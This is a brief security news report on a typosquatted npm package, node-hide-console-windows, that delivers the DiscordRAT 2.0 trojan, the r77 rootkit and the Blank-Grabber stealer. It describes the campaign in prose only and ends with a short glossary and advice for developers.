The trust we place in open-source repositories is being challenged. A new deceptive package found in the npm registry has been caught deploying an open-source rootkit called r77, marking a unique instance where a rogue package delivers rootkit capabilities.
Unmasking the Rogue
The suspicious package, named node-hide-console-windows, cleverly mirrors the legitimate npm package, node-hide-console-window. This is a classic example of a typosquatting campaign, where attackers use misspelled or closely related names to deceive users. Within the past two months, it has been downloaded 704 times.
ReversingLabs, the first to detect this malicious activity, revealed that the package leads to the deployment of a Discord bot, which then plants the r77 rootkit. What's alarming is the possibility that open-source projects might become a growing medium to distribute malware.
Delving Deeper into the Malice
Once executed, the rogue package’s index.js file fetches an executable that's launched immediately. This is none other than the C#-based open-source trojan DiscordRAT 2.0. This trojan allows attackers to remotely control a victim's host over Discord, enabling the collection of sensitive data and even disabling security software. The command "!rootkit" specifically initiates the r77 rootkit.
Interestingly, this isn’t r77’s first malicious appearance. It's been part of multiple campaigns before, including those that distributed the SeroXen trojan and even cryptocurrency miners.
Additionally, the node-hide-console-windows package has been seen fetching another open-source info stealer called Blank-Grabber. The entire campaign’s foundation rests on public components available online, highlighting that even low-tier threat actors can now exploit the supply chain.
Key Terms Glossary
Rootkit: A collection of software tools that allow unauthorized access to a computer.
npm Registry: A package manager for the JavaScript programming language.
Typosquatting: A tactic where attackers use misspelled domain names to deceive users.
r77: An open-source rootkit used to hide files and processes.
DiscordRAT 2.0: A C#-based open-source trojan offering remote control capabilities over Discord.
Summary
The discovery of the rogue npm package serves as a wake-up call. Open-source repositories, while providing immense value, can also be exploited by cybercriminals. Developers need to practice caution when installing packages, always verifying their authenticity.
Comments